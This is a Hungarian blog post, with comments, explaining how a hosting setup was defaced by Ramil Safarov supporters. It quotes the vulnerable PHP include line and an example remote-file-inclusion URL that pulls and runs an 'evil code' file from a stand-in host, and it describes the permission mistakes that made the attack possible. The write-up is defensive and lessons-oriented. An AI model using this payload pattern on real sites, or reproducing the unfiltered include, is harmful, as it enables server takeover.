Nos, Ramil Safarov egy érdekes ember. Azonkívül, hogy sokan láthattátok hasonlatosságát Csányi Sándor ünnepelt szinészünknel, egy örmény társának életét vette egy baltával. Ennek ellenére, vagy éppen ezért Azerbajdzsánban az Év Embere lett.
Weboldala három nyelven köszönti az olvasókat, köztük magyarul is. Ennek oka gondolom az, hogy tudomásom szerint még mindig nálunk van fogva tartva. Naprakész információval nem rendelkezem, pedig igyekeztem utánajárni a dolognak.
A dolgot szőnyeg alá seperhettük volna, s hallgathatnék a hibáinkról, de úgy érzem jobb ide leírni, hogy mi is, s Ti is tanulhassatok belőle.
És most akkor a technikai bla-bla. A deface-t három dolog együttállásának köszönhettük. Egy nem éppen biztonságos php include parancsot az egyik domainen, illetve két kényelmi szolgáltatást kihasználva sikerült elérni, hogy önakaratunkon kívül sikerült betársulnunk Ramil szabadításáért küzdők népes táborába.
"include_once($_GET[oldal]."_".$_SESSION[lang].".php");"
kód tanult kollégám szerint kiváló lehetőséget nyújt a rosszindulatú emberünknek, hogy a index.php?oldal=http://oldalam.com/gonosz-kodom.php?semmi=
szöveg címsorba írása után http://oldalam.com/gonosz-kodom.php?semmi=_hu.php
-t inklúdolja (mi erre a szép magyar szó), s lefuttassa. (a domain, illetve a kód tulajdonosát értesítettük, hogy javítsa ki, távolítsa azt el az oldalról.)
Ezzel emberünk a webszerver jogaival tudott fájlokat létrehozni. S valóban tudott is, mert kényelmi okokból sok domainen biztosítottuk az írásjogot. És, hogy a dolog még szebb legyen egy nemrég felkerült domain kedvéért létezett egy aldomain, amivel a teljes wwwroot bejárható volt. (megszüntettük az írásjogot, mindenkinek magának kell ezután engedélyezni, ha szeretné, hogy fel tudjon tölteni, stb. Az aldomaint szintén megszüntettük)
Tanulság: Kiskaput nem nyitunk, vagy ha igen, azonnal bezárjuk. A dolog előnye viszont, hogy íly módon minden cms a legfrissebbre lett upgrade-elve, ezzel csökkentve egy következő akció sikerességét. Frissült a teljes rendszer, minden, ami lehetett.
És akkor a végére az állandó kérdés, hogy mi a helyes arány a biztonság és a használhatóság között?
Comments
4 responses to “ramil safarov”
Otthon, localban lehet az admin jogkörrel garázdálkodni, de kint a dzsungelben korlátozni, amennyire csak lehet. És inkább legyen minden aloldalra, feladatra külön user/pass, mint egy mindenhova.
Amúgy a $_GET[oldal] ebben a formában tálcán kínálta a lehetőséget. Eleve ami GET-en jön, azt mindig le kell szűrni.
Egy ilyen kódsor olyan messze van a biztonságtól, mint sósav az üdítőtől – no comment kategória. 🙂
@Bártházi András: hát igen. Nem véletlen szóltunk is az embernek, amint megtaláltuk, hogy gyorsan kezelje a helyzetet. A “vicc”, hogy a másik két dologgal együtt jól rásegített a nagy örömre az azerbajdzsániaknál.
@_alesi_: a korlátozással egyetértek, de pl. ma sokadjára szivattam meg magam a bankkártya limittel. Jól lekorlátoztuk anno, ma meg fizetésnél 2 kártyáról tudtuk csak intézni.
Szórakoztató adalék, hogy ez lett belőle:
http://www.sunscreen.hu/cracked.html 🙂
Sztem ahhoz, hogy egy webhely biztonságos legyen, nem kell még semmit engednünk a felhasználhatóságból.